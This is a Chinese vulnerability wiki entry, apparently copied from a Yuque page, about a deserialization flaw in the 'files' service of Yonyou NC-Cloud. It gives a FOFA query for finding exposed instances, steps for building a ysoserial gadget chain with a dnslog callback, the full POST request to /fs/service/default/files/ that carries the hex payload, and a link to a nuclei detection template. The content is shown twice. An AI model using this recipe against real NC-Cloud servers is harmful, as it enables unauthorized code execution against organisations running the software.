fofamini-wiki

登录白背景

源码

用友NC-Cloud files存在反序列化漏洞

一、漏洞简介

用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud files存在反序列化漏洞

二、影响版本

用友NC-Cloud

三、资产测绘

fofaapp="用友-NC-Cloud"
登录页面

四、漏洞复现

用yakit生成dnslog域名

使用yso生成利用链

将上一步生成的hex数据替换payload字段，探测是否存在漏洞

POST /fs/service/default/files/ HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 1354
Accept-Encoding: gzip, deflate

{{hexd(payload)}}

nuclei脚本
用友-nc-cloud-files-反序列化.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/bqp65rt6cy3d4lts

# 用友NC-Cloud files存在反序列化漏洞

# 一、漏洞简介
用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud files存在反序列化漏洞

# 二、影响版本

- 用友NC-Cloud

# 三、资产测绘

- fofa`app="用友-NC-Cloud"`
- 登录页面

![image.png](./img/q1C3nEhYRcE6VcTT/1693575676700-0c5fed77-e3d1-4473-97a7-bfb8e7ae0bc1-587761.png)

## 四、漏洞复现

1. 用yakit生成dnslog域名

![image.png](./img/q1C3nEhYRcE6VcTT/1703423668592-ce649bd8-1fa5-45ea-b338-b6fe5ab646fb-430313.png)

2. 使用yso生成利用链

![image.png](./img/q1C3nEhYRcE6VcTT/1703423688858-bed3b56d-218d-44cc-b2d7-edee9edc196f-716782.png)

3. 将上一步生成的hex数据替换payload字段，探测是否存在漏洞
```
POST /fs/service/default/files/ HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 1354
Accept-Encoding: gzip, deflate

{{hexd(payload)}}
```
![image.png](./img/q1C3nEhYRcE6VcTT/1703423726614-9984f7a9-5c33-4c14-86c9-55dd4b4a0d21-701626.png)
![image.png](./img/q1C3nEhYRcE6VcTT/1703423736640-777ec484-5b54-455f-a18b-1d65e1d01969-510669.png)
nuclei脚本
[用友-nc-cloud-files-反序列化.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219610910-d432a885-4cef-42ba-a9e5-6921336cd9df.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219610910-d432a885-4cef-42ba-a9e5-6921336cd9df.yaml%22%2C%22name%22%3A%22%E7%94%A8%E5%8F%8B-nc-cloud-files-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.yaml%22%2C%22size%22%3A580%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u1166ca2d-e4dd-4547-8649-fb463bac986%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22uaa6484d7%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bqp65rt6cy3d4lts>